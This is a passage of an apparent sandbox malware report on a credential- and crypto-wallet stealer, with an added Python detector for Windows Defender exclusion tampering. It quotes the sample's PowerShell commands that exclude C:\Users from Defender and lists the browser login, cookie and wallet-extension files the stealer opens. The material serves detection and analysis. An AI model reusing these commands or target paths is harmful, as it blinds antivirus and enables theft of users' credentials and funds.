                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\eXbhgU9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000442008.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034658260.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
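
The two powershell.exe command lines recorded in this section add Defender exclusions for the drop directory and for all of C:\Users, which blinds real-time protection to every user profile on the machine, and the report's Sigma hit for a Base64-encoded MpPreference cmdlet shows the same action also travels in -EncodedCommand form. The following Python detector is an added example, not report content and not a Joe Sandbox component: it takes process-creation command lines as a Sysmon Event ID 1 or Security 4688 pipeline would hand them over, decodes -EncodedCommand payloads (PowerShell encodes the script as UTF-16LE before Base64), and rates any Add-/Set-MpPreference exclusion, with broad paths such as a drive root or C:\Users rated high. The two plaintext command lines are taken from this report; the encoded variant, the benign control line, the path policy and the severity labels are the example's own assumptions.

```python
"""Flag Windows Defender exclusion tampering in process-creation command lines.

Added example for this report; the severity policy and the encoded sample are
assumptions made here, not report content. Scope is exclusions only; other
Set-MpPreference switches are deliberately out of scope.
"""
import base64
import binascii
import re

# Cmdlets that change Defender preferences (Get-MpPreference is read-only and ignored).
MP_CMDLET_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)

# -ExclusionPath 'C:\x'  |  -ExclusionPath "C:\x"  |  -ExclusionPath C:\x
# Comma-separated lists ('C:\a','C:\b') are a known gap: only the first value is taken.
EXCLUSION_RE = re.compile(
    r"-Exclusion(Path|Process|Extension|IpAddress)\s+"
    r"(?:'([^']*)'|\"([^\"]*)\"|([^\s;,]+))",
    re.IGNORECASE,
)

# PowerShell accepts -EncodedCommand and its unambiguous prefixes (-e, -ec, -enc ...).
ENCODED_RE = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Exclusions on a drive root or a top-level tree hide most of what a stealer touches.
BROAD_ROOTS = {"c:", "c:\\users", "c:\\programdata", "c:\\windows", "c:\\program files"}


def decode_encoded_command(cmdline):
    """Return the script carried in -EncodedCommand (UTF-16LE under Base64), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def is_broad(path):
    """True for a drive root, a top-level tree, or an environment-variable rooted path."""
    p = path.strip().lower().rstrip("\\")
    return p in BROAD_ROOTS or p.startswith(("%", "$env:"))


def analyze_cmdline(cmdline):
    """Return a finding dict for an Add-/Set-MpPreference exclusion, else None."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    if not MP_CMDLET_RE.search(script):
        return None
    exclusions = [
        (kind.lower(), single or double or bare)
        for kind, single, double, bare in EXCLUSION_RE.findall(script)
    ]
    if not exclusions:
        return None
    broad = any(kind == "path" and is_broad(value) for kind, value in exclusions)
    # Encoding the cmdlet is itself an evasion signal, so it is rated like a broad path.
    severity = "high" if broad or decoded is not None else "medium"
    return {"exclusions": exclusions, "encoded": decoded is not None, "severity": severity}


def make_encoded_cmdline(script):
    """Build the -EncodedCommand form exactly as PowerShell expects it (UTF-16LE, then Base64)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f'"powershell.exe" -NoProfile -EncodedCommand {b64}'


# The two command lines the report records for eXbhgU9.exe -> powershell.exe.
REPORTED_CMDLINES = [
    "\"powershell.exe\" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\FkSpRTrp'",
    "\"powershell.exe\" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users'",
]

# Constructed for this example: the same action in encoded form, plus a benign read-only call.
ENCODED_SAMPLE = make_encoded_cmdline("Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData'")
BENIGN_SAMPLE = '"powershell.exe" -Command Get-MpPreference | Select-Object ExclusionPath'

if __name__ == "__main__":
    for line in REPORTED_CMDLINES + [ENCODED_SAMPLE, BENIGN_SAMPLE]:
        print(analyze_cmdline(line), "<-", line[:80])
```

Pair this with the Defender operational log: Microsoft-Windows-Windows Defender/Operational Event ID 5007 records the configuration change itself, including new Exclusions\Paths entries, so a command-line hit and a 5007 event within seconds of each other corroborate one another even when the command line was obfuscated beyond what the regexes above catch. The C:\Users exclusion is the one to treat as an incident on its own: it covers every profile's AppData, which is exactly where the stealer in this report goes looking next.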

                Stealing of Sensitive Information

                Source: Yara matchFile source: Process Memory Space: jyidkjkfhjawd.exe PID: 7940, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyne
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1877860418.00000000013B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: powershell.exe, 00000002.00000002.1708439334.0000000007070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
